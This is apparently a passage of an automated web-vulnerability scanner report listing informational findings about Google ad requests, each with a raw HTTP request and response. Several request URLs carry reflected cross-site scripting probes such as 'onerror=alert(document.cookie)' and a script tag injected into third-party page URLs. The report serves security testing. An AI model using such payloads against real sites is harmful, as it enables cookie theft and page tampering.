5ABJsFnmbaw37_FA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBTeI_NkC0TZX6Gsn8lQfy4an7AcCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABsPLiLav0OCOJQ%26num%3D1%26sig%3DAGiWqtxFN-SWoeyrcbJOM_G6FSduNZ7Mqw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.409. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676423&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658423393&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658423399&frm=1&adk=2614322350&ga_vid=1039958098.1303658423&ga_sid=1303658423&ga_hid=1366482108&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=10 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1371

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDNGQjQwMDA2NTg3NDBBRTU3RDgzMjBGNTRBNzF8R0ZJNDhESlVSdnwxMzAzNjU4NDIyNDYyfDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUwMTk3&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_tAAGWHQK5X2DIPVKcQdX290LxWrhLLpQlQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjQwMDA2NTg3NDBBRTU3RDgzMjBGNTRBNzE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=150&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.410. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303677117&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Fhostingcataloguecom%2Fsql-injection-reflected-xss-application-error-dork-ghdb-example-poc-report.html&dt=1303659117665&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303659117761&frm=0&adk=1607234649&ga_vid=508403833.1303659118&ga_sid=1303659118&ga_hid=1380168726&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=160&xpc=F4HtxOYY86&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:31:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/hostingcataloguecom/sql-injection-reflected-xss-application-error-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DGL450%2Bvs%2BEscalade%26adU%3DUniblue.com/Fix_DLL_Errors%26adT%3DRecommended%2BDownload%26adU%3Dwww.provinetsolutions.com%26adT%3DTotal%2BIT%2BSolutions%26gl%3DUS&amp;usg=AFQjCNGwNYPX3_tz13PHx1-33Sk0gegRuA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.411. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303682000&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303664000983&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303664000988&frm=1&adk=2614322350&ga_vid=1376642986.1303664001&ga_sid=1303664001&ga_hid=14134993&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=126 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:53:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15162

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3DInfocus.com/MSPRevenue%26adT%3DIncrease%2BMSP%2BRevenue%26adU%3Dtripplite.com/CoolingSolution%26adT%3DPortable%2BAC%2BUnit%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26gl%3DUS&amp;usg=AFQjCNGuEVVcf9cSWV1gPAaqRWUn1uE2uA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.412. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680475&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662475695&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662475700&frm=1&adk=2614322350&ga_vid=1353029801.1303662476&ga_sid=1303662476&ga_hid=445912006&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:27:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14934

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.quietpcusa.com%26adT%3DXRackPro2%2B25U%2BRackmount%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26gl%3DUS&amp;usg=AFQjCNEqYj3oNbyKtNCb6XV80NSNQpl1kw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.413. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyw%2Fa6d4b%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert(document.cookie)%253E1a348cd60acord%7D&dt=1303661268504&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303661268528&frm=1&adk=2614322350&ga_vid=574620052.1303661269&ga_sid=1303661269&ga_hid=1714517726&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=30 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:07:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4495

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_a.php%253Fsearch%253D%25257B%2524keyw/a6d4b%252522%25253E%25253Cimg%252520src%25253Da%252520onerror%25253Dalert(document.cookie)%25253E1a348cd60acord%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.CreateSpace.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEJ2dVwtcR3dMlltrXk6V9Gk8KglQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.414. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679773&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661773489&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661773500&frm=1&adk=2614322350&ga_vid=557233879.1303661774&ga_sid=1303661774&ga_hid=1850814046&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:16:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4632

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="160" HEIGHT="600"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CJ7RpbmW14m8ugEQoAEY2AQyCAIsW0C5dnwp">
...[SNIP]...
ACAZgC-gG4AhjIAvylmRioAwHoA7wB6AOUAvUDAAAAxA%26num%3D1%26sig%3DAGiWqtygLcwqlca1wBb1CFptZH3wqBzr4A%26client%3Dca-pub-6888065668292638%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CJ7RpbmW14m8ugEQoAEY2AQyCAIsW0C5dnwp" id="google_flash_embed" WIDTH="160" HEIGHT="600" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBxVbZyky0Tf3NIZClsQeE4r3ODeye5-oBtPu77RfAjbcBABABGAEg2aK3DzgAUJbK_tsDYMnug4jwo-wSoAHQi_DtA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBBNoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YoACAZgC-gG4AhjIAvylmRioAwHoA7wB6AOUAvUDAAAAxA%26num%3D1%26sig%3DAGiWqtygLcwqlca1wBb1CFptZH3wqBzr4A%26client%3Dca-pub-6888065668292638%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.ZTSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHsNxLyezuqEmJFsMUkJFnqxcE9Sw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.415. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681496&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663496481&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663496493&frm=1&adk=2614322350&ga_vid=256732873.1303663496&ga_sid=1303663496&ga_hid=1292892372&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:44:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=uVcXM6yIvX7j2eMeidIQF8a5V_TzjpZVqwZTLNVfkjpU_hRf7pGKgJjnX9jA2aaDJ7MbV9P6kqCVP7g0UHgms69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN4WptGk9EHnij-KmuGWgmGq44jHQGDLrsdmUV6C-zfBNFavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYURF3cxdhB63ePyXNa6x4KFoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk-NauV1Zwl6f2AAejC0b7-vH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRThQAIxusK7Fow09Ae66CdI15yT-MbOhaEIA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuD8thVO0TeuNI7C0sQfrvcCeDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtz0MVZOCUcSk96pPZbUcmjBAnNc9g%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.416. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9314328132562548&output=html&h=90&slotname=1448208227&w=728&lmt=1303693150&flash=10.2.154&url=http%3A%2F%2Fwww.fightidentitytheft.com%2Fcredit-monitoring.html%3F80f55%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E8381f047dea%3D1&dt=1303675206881&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303675206923&frm=0&adk=3080309030&ga_vid=2066914421.1303674267&ga_sid=1303674267&ga_hid=1849562887&ga_fc=1&ga_wpids=UA-192617-1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1034&bih=907&ref=http%3A%2F%2Fburp%2Fshow%2F18&fu=0&ifi=1&dtd=167&xpc=m9DHux0lwz&p=http%3A//www.fightidentitytheft.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
